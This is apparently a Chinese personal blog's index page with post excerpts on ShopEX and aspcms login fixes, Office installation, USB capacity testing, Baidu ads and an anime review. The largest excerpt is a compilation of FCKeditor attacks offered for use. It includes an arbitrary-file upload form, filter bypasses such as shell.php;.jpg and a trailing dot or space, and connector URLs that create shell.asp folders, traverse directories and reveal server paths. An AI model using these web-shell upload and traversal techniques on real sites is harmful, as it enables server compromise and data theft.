职业赌徒

光的傳人

歡迎訪問日志最新發布

快云VPS

ShopEX后臺登錄超時(由于動態IP限制導致)的正確解決方法(測試成功)

ShopEX后臺登錄超時,確實是因為動態ip限制導致的。因為我朋友那邊一登錄后臺就提示:登錄超時,請重新登錄!而我電腦,一切正常。遇到這種問題,首先問度娘、谷歌。可是問來問去,無非就這同一個答案:

***找到core文件夾下面的func_ext.php文件,搜索"return $GLOBALS['_REMOTE_ADDR_'];" (大概在第412行),在return $GLOBALS['_REMOTE_ADDR_'];前面加入一行代碼,如下:

...

shopex最新版single-4.8.5.78660安裝沒有反應解決方法

買了一個香港的虛擬主機,上傳了shopex的最新版程序,可是訪問的時候竟然是一片空白!OMG,怎么回事?查看源代碼,也沒有代碼顯示,路徑沒有問題啊!再檢查一下,發現txt文本文件可以打開,php的文件打開都是空白。

仔細分析了下安裝說明,readme一定先讀我.txt明確強調了“特別說明:從本版本開始,安裝環境不再兼容php4,只支持php5,請安裝前一定要先確認php的版本”,“語言環境:PHP 5.1.2 及以上”,“特別說明:從本版本開始,必須開啟mcrypt擴展庫,否則會員相關功能不可使用“,難道跟PHP版本有關!?切換個版本看看!

...

aspcms后臺登陸超時:您還未登陸,請登錄!解決方法

朋友說我那個網站在后臺編輯文章時,還沒有編輯完,就提示:您還未登陸,請登錄!非常的惹人討厭。我很久之前遇到過這種情況,那還是在學校的時候,學校的一個網站莫名其妙的出現這種情況,我改了Session.TimeOut=增加了很大的值也不能解決,最后不了了之,這個問題自然就好了。(當時還真的莫名其妙不知道根本原因是什么)

今天又要解決這個問題,還得下一番功夫研究。在aspcms里面,控制超時的代碼是inc/checkcode.asp里面的Session.TimeOut=60,默認是60分鐘(我百度這個代碼,竟然發現搜搜問答上面竟然說這個60是秒!暈,改信誰?)這次我仔細研究了一番,如果是60分鐘,一小時的話,不會幾分鐘就掉一次,肯定還有別的原因,就算修改了代碼,改成120估計該出問題還是會出的。

...

win7安裝office 2007出現錯誤,安裝失敗解決方法

給工作的電腦重裝了win7,自帶的office2007精簡版的完全滿足不了工作需要,表格里很多效果不能顯示!精簡版的雖然可以滿足一般的工作學習需要,可是專業性的數據表格文檔還是不行的。于是我自作聰明,裝了個最新版的wps,以為萬事大吉了。誰知道出現了更大的問題,雖然有些表格文檔兼容性還算不錯的,但是有些直接出現錯誤。我費了半天時間做出的一個數據表格,傳給同事,竟然格式什么的都亂了!這樣就不好了!

于是必須要安裝完整版的office2007,要不然真沒法工作了,要是因為軟件導致工作浪費時間,那可就太丟人了!

...

u盤擴容檢測工具MyDiskTes該升級了!

數據無價,買U盤需謹慎!謹以此文獻給那些買了虛假容量U盤的朋友。

記得大學的時候,班上一哥們從網上買了個8GU盤,相當便宜,我就懷疑是不是真的實際容量8G,結果買來之后,用MyDiskTes檢測,竟然是2G的量產修改的!于是我就重新給他量產了,恢復到真實容量!說實話,這種U盤不僅僅是擴容這么簡單,用的芯片也是非常垃圾的,讀取處理數據非常的慢!

昨天公司一同事把兩年的工作表(大概4G)都剪切(大姐,是剪切啊!能不能復制一下啊!)到一個寫著金士頓牌子的號稱32G的U盤里,結果考完之后發現東西都沒有了~悲催吧!幸好哥們我還會點數據恢復,用了大概倆小時,用盡了工具終于給她恢復出來了!當然,得大大的整理一番!

...

百度網盟通過啦!

曾經申請過百度網盟,但是第一次申請,說我網站達不到要求,就沒過。后來在松哥博客上看到一篇文章,說百度網盟有個很好的方法通過,那就是:不斷的申請!不斷的被拒絕,不斷的再去申請!總有一次你會過得!祝大家好運!

恭喜您成功注冊為百度聯盟會員。您可以使用以下業務或服務:

搜索推廣合作 在頁面上放置百度搜索框,將搜索流量轉化為搜索收入。

工具欄合作 軟件開發者選擇與百度合作,通過百度超級搜霸軟件提升軟件的變現能力。

網盟推廣合作 在頁面上投放與內容相關的百度網盟推廣合作業務,將流量轉化為點擊收入。

...

原來做程序員是這么的辛苦~

做了兩天的網站建設技術,才發現原來在網絡公司做技術員跟自己做技術員是那么的大不相同~

1、做站進度更快了!

自己接的活自己可以決定完成的時間以及自由分配時間來完成。但是到了網絡公司,就得很辛苦的速戰速決,要求技術要熟練。公司要的是效率,要的是速度,不是自己的想法。

2、技術要求更高了!

編程這一塊算是自己的軟肋了,沒有專門學過網站編程語言,靠著自己琢磨,比著葫蘆畫瓢的方法,吃力的寫幾行代碼才走到今天。如今要作為強有力的技術支持,一定要先充實自己!在大學的時候雖然學了c語言,對于編程語言的思路還是能看懂的,也很好理解,但是沒基礎就不知道語法錯誤,在編寫的時候就會困難重重!所以,還是得學一下編程語言!尤其是數據庫語言!

...

Fckeditor漏洞最新整理 2

1、查看編輯器版本
/fckeditor/editor/dialog/fck_about.html

...

Fckeditor編輯器漏洞整理

FCKeditor v2.43版本FCKeditor/editor/filemanager/browser/default/connectors/php/config.php
FCKeditor V2.6.6版本 fckeditor/editor/filemanager/connectors/asp/config.php

查看編輯器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 環境下在上傳文件后面加個.突破!測試通過。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在處理PHP 上傳的地方并未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
—————————————————————————————————————————————————————————————

高版本存在 低版本不存在
4.FCKeditor 文件上傳“.”變“_”下劃線的繞過方法
       很多時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變為shell_php;.jpg 這是新版FCK 的變化。
   4.1:提交shell.php+空格繞過
不過空格只支持win 系統 *nix 是不支持的[shell.php 和shell.php+空格是2 個不同的文件 未測試。
   4.2:繼續上傳同名文件可變為shell.php;(1).jpg 也可以新建一個文件夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夾

FCKeditor V2.6.6

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor v2.4.3

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
/wwwroot/userfiles/image/333.asp/2.asp;3.jpg

6. FCKeditor 中test 文件的上傳地址


最新的 利用iis解析漏洞asp文件夾上存圖片  或者是2.asp;jpg


FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
userfiles/file/1.asp;2(1).jpg
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————

7.常用上傳地址
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor V2.6.6不能上傳 不能建立
FCKeditor v2.4.3能上傳 能建立
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測試通過)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意紅色部分修改為FCKeditor 實際使用的腳本語言,藍色部分可以自定義文
件夾名稱也可以利用../..目錄遍歷,紫色部分為實際網站地址。
—————————————————————————————————————————————————————————————

8.其他上傳地址
全部存在
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站點都已刪除_samples 目錄,可以試試。

FCKeditor V2.6.6(空白)
FCKeditor v2.4.3 存在
FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁。
—————————————————————————————————————————————————————————————

9.列目錄漏洞也可助找上傳地址
Version 2.4.1 測試通過
修改CurrentFolder 參數使用 ../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根據返回的XML 信息可以查看網站所有的目錄。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接瀏覽盤符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————

10.爆路徑漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————

11. FCKeditor 被動限制策略所導致的過濾不嚴問題
       影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 類別默認拒絕上傳類型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件上傳后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension 為后綴.直接導致在win 下在上傳文件后面加個.來突破[未測試]!
       而在apache 下,因為"Apache 文件名解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義TYPE 變量時使用File 類別來上傳文件,根據FCKeditor 的代碼,其限制最為狹隘。
       在上傳時遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點或空格繞過,也可以利用2003 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞,Type文件沒有限制!
       我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,因為程序對type=xxx 的類型沒有檢查。我們可以直接構造上傳把type=Image 改成Type=hsren 這樣就可以建立一個叫hsren的文件夾,一個新類型,沒有任何限制,可以上傳任意腳本!

...

《尸鬼》觀后感

《尸鬼》,一個并不知名的日本恐怖動畫片,本來我是沒有興趣看動漫的,更沒有興趣看日本動漫,但是老婆大人一發話:必須得看,并且看完后寫讀后感!于是就有了本文!

...

职业赌徒